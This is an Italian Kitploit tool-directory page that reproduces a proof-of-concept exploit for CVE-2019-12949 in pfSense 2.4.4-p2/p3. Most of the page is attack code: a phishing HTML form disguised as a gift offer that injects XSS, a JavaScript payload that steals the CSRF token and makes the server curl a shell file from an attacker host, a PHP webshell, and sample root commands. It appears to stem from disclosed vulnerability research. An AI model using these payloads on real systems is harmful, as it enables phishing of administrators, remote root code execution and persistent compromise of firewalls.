Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-12949 — CVE-2019-12949 | Kitploit
Strumenti/GitHubGitHub/tarantula-team/cve-2019-12949
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPhishingCommand and ControlSviluppo Payload
GitHubtarantula-team/cve-2019-12949

CVE-2019-12949

CVE-2019-12949

Vedi Repository
2597 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

[CVE-2019-12949] Dalla vulnerabilità di Cross Site Scripting all'Esecuzione di Codice Remoto in pfSense 2.4.4-p2 e 2.4.4-p3

Descrizione informativa:

In pfSense 2.4.4-p2 e 2.4.4-p3, se è possibile indurre l'amministratore autenticato a cliccare su un pulsante in una pagina di phishing, un attaccante può caricare codice eseguibile arbitrario tramite ding_command.php e rrd_fetch_json.php su un server. A quel punto, l'attaccante remoto può eseguire qualsiasi comando con privilegi di root su quel server.

Ricercatore: Enter of The Tarantula Team, VinCSS (un membro di Vingroup)

PoC XSS

Vettore d'attacco: https://pfSense_IP_Address/rrd_fetch_json.php

Invia una richiesta POST:

root@kitploit:~
<form action="https://[PFsense-domain]/rrd_fetch_json.php" method="post">
	<input type="hidden" name="left" value="system-processor"><br>
	<input type="hidden" name="right" value="null"><br>
	<input type="hidden" name="start" value=""><br>
	<input type="hidden" name="end" value=""><br>
	<input type="hidden" name="resolution" value="300"><br>
	<input type="hidden" name="timePeriod" value="i3i3j<script>alert(1)</script>tz9b1"><br>
	<input type="hidden" name="graphtype" value="line"><br>
	<input type="hidden" name="invert" value="true"><br>
	<input type="hidden" name="refreshInterval" value="0">
  <h1>Congratulations on receiving the reward from us</h1>
  <h1>Click to receive gifts</h1>
  <input type="submit" value="Submit">
</form>

Da XSS a RCE

L'attaccante può creare un sito di phishing come questo per sfruttare la vulnerabilità XSS su pfSense:

root@kitploit:~
<form action="https://[PFsense-domain]/rrd_fetch_json.php" method="post">
	<input type="hidden" name="left" value="system-processor"><br>
	<input type="hidden" name="right" value="null"><br>
	<input type="hidden" name="start" value=""><br>
	<input type="hidden" name="end" value=""><br>
	<input type="hidden" name="resolution" value="300"><br>
	<input type="hidden" name="timePeriod" value="i3i3j<script src='https://[Attacker-Server]/payload.js'></script>tz9b1"><br>
	<input type="hidden" name="graphtype" value="line"><br>
	<input type="hidden" name="invert" value="true"><br>
	<input type="hidden" name="refreshInterval" value="0">
  <h1>Congratulations on receiving the reward from us</h1>
  <h1>Click to receive gifts</h1>
  <input type="submit" value="Submit">
</form>

Il file payload.js nel server dell'attaccante conterrà il seguente codice Javascript (Payload):

root@kitploit:~
<script>
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "https://[PFsense domain]/diag_command.php", false);
	xhr.withCredentials=true;
	xhr.send(null);
	var resp = xhr.responseText;
	console.log(resp);
	var start_idx = resp.indexOf('name=\'__csrf_magic\' value="');
	var end_idx = resp.indexOf('" />', start_idx);
	var token = resp.slice(start_idx + 27, end_idx);
	console.log(token);
// now execute the CSRF attack using XHR along with the extracted token
	var xhr1 = new XMLHttpRequest();
	xhr1.open("POST", "https://[PFsense-domain]/diag_command.php", false);
	xhr1.withCredentials=true;
	var params = "__csrf_magic="+token+"&txtCommand=curl https://[Attacker-Server]/shell.txt > a.php&submit=EXEC";
	xhr1.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xhr1.setRequestHeader("Content-length", params.length);
	xhr1.send(params);
</script>

Il file shell.txt nel server dell'attaccante conterrà i contenuti di una webshell PHP, come questa:

root@kitploit:~
<?php
	system($_REQUEST['cmd']); // allow remote attacker to run commands on victim server
	phpinfo(); // show phpinfo
?>

Infine, l'attaccante indurrà gli amministratori autenticati di pfSense (vittima) ad accedere al sito di phishing e cliccare sul pulsante 'Submit' sul sito di phishing. Quindi la vittima verrà reindirizzata al sito di amministrazione di pfSense, e la webshell dell'attaccante verrà caricata automaticamente con successo sul server pfSense.

Da lì, l'attaccante remoto può eseguire codice arbitrario come root sul server pfSense:

root@kitploit:~
https://[PFsense-domain]/a.php?cmd=whoami
https://[PFsense-domain]/a.php?cmd=ls
Scarica lo strumento